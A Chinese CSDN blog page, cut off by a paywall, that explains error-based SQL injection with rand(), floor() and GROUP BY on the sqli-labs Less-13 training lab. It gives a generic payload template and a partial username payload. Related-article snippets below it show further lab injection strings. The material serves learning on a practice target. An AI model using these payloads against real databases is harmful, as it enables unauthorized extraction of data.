sql注入中rand()和group by双注入报错(以sqli-labs_Less13为例)

已于 2022-09-07 14:52:26 修改
阅读量978 收藏 2
点赞数 2
分类专栏: 网络安全 文章标签: mysql 安全
于 2020-11-30 02:36:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46145442/article/details/110361101
版权

文章目录

原理

原理是利用rand()*2重复计数和group by配合,导致临时表插入的主键重复以报错,不适用于表中只有2条数据以下的情况
标准payload:

//$$包含的是可变参数,[]内是可省略参数
$anything$ [前置参数闭合符号] [and|union] select count(*),concat(($payload$),floor(rand(0)*2)) as a from $table$ group by a [截断后置查询符号]

sqli-labs_Less13

只输入用户名admin时,POST数据为:

uname=admin&passwd=&submit=Submit

用户名处payload:

admin ') union select count(*),concat((database()),floor(rand(0
最低0.47元/天 解锁文章
star2y9
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql使用group by查询报错SELECT list is not in GROUP BY clause and contains nonaggregated column...原因及解决方案
江海寄余生的博客
03-30 1万+
最近公司新建了一个项目,在项目需要用到group by进行聚合计算,在计算的同时也要查出一些其他字段来返回给前端。于是就有了这个错误的出现。 先简单复现我所写的sql,其实sql非常简单。 select channel_name as channelName, brand_name as brandName, sum(actual_value) as actualValue, sum(actual_value_ty) a
sql-group by 报错
weixin_55845798的博客
05-31 535
因此对于GROUP BY聚合操作,如果在SELECT的列,没有在GROUP BY出现,那么这个SQL是不合法的,因为列不在GROUP BY从句,也就是说查出来的列必须在group by后面出现否则就会报错,或者这个字段出现在聚合函数里面。在MySQL 5.7 版本及以上版本会出现的问题该问题,原因为MySQL 5.7版本默认的sql配置是:sql_mode=“ONLY_FULL_GROUP_BY”,这个配置严格执行了"SQL92标准"。查看sql_mode。修改sql_mode。
sql注入报错注入
最新发布
2302_79119987的博客
04-19 1107
实行注入的地方。
SQLi LABS Less-13 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十三关,SQLi-LABS Less-13SQLi-LABS Less 13SQLiLABS Less13SQLi Less 13
sqli-labs第十三关
yuqnqi的博客
05-09 417
第二个参数: xml的位置是可操作的地方,xml文档查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。tip: 还有要注意的地方是,它能够查询的字符串长度最大是32个字符,如果超过32位,我们就需要用函数来查询,比如right(),left(),substr()来截取字符串。构造语句,先用 ') 进行闭合,判断列数是多少,持续增加列数,直到返回正确的结果。判断注入点的闭合方式。
Sql注入 Group by rand() floor() Count(*)报错原理
weixin_42357645的博客
09-26 1022
Sql注入 Group by rand() floor() Count(*)报错原理 一般组合为Group by floor(rand()*2) rand() 是个伪随机函数,产生的随机数有一定的规律可循。例如: select floor(rand(0)*2) from information_schema.columns; 这段语句产生的结果恒定不变始终是下面的序列: 结合count() 和group up 就可以爆出数据库名。 select count(*), concat(database(),f
PHP、Apache环境部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程可能会遇到各种...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当...
SQL注入漏洞-03】报错注入靶场实战
cc
02-02 6341
注入点的判断过程,发现数据库SQL语句的报错信息,会显示在页面,因此可以进行报错注入 报错注入的原理:就是在错误信息执行SQL语句。触发报错的方式很多,具体细节也不尽相同。报错注入有可能成功,也有可能不成功!可以多刷新几次
sqli-labs-13
qq_53030229的博客
05-10 291
文章目录一、抓包、判断注入点二、判断回显字段三、获取数据库四、获取数据表五、获取字段六、获取用户名、密码 摸鱼,最近不知道干什么ε=(´ο`*)))唉 一、抓包、判断注入点 二、判断回显字段 其实这里只有两个回显字段的,我这里使用3只是为了让你们方便看 uname=234')order by 3--+ 三、获取数据库 uname=234') and exp(~(select * from (select database() ) a) )--+ 四、获取数据表 uname=234') and
sqli - labs - 13 ~ 14
m0_62102000的博客
07-15 254
sqli - labs - 13 ~ 14
SQL函数不能使用rand()函数又一解决办法
ETZRP的专栏
08-29 1万+
今天需要在函数产生一个5~10之间的随机数,不假思索的写了如下代码: Create Function XX ( @Price decimal(18,2) ) RETURNS decimal(18,2) AS BEGIN -- Declare the return va
excel 字符串超长_如何成体系掌握Excel函数(一)
weixin_42470145的博客
12-09 931
有没有遇到过这种情况?用Excel在处理数据,或者分析数据的时候,有时候想不起来用什么函数,或者出现错误却不知道问题出在哪儿。本来几分钟能解决的任务,花了不少时间去百度搜索答案,或者求助于人。对于多数人来说,这确实是一个必经的学习的过程,但是这种碎片化的学习毕竟效率并不高。接下来我们系统性地分享函数的基础知识,以及函数在分析的应用。单个Excel函数本身并不难理解,难的是灵活应用,例如...
SQL function使用rand随机函数
周尚冬的专栏
12-08 1854
在存储过程,我需要得到一个随机码,但是又不能和以前的随机码重复。于是我使用了一个Function 去生成随机码。但是问题出现了。但是function是不能使用rand函数的,于是就卡在这里了。怎么办呢?然后我看到了view视图,如果在function把生成随机数这个东西放到view 不就可以了。于是我建了这样一个试图 SELECT     RAND() * 100000 AS
SQL查询时 group_concat 报错 was cut by GROUP_CONCAT()
走在搬砖的路上!
03-22 1万+
MySQL 设置group_concat_max_len GROUP_CONCAT函数用于将多个字符串连接成一个字符串,在拼接成字符串时就会存在拼接长度的问题,mysql 默认的拼接最大长度为1024个字节,由于1024个字节会出现不够用的情况,所以有时需要去根据情况进行修改,方式如下。 1、查看当前mysql group_concat_max_len 进入mysql状态,输入:show variables like 'group_concat_max_len'; 如果未曾修改会得到下面结果 .
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值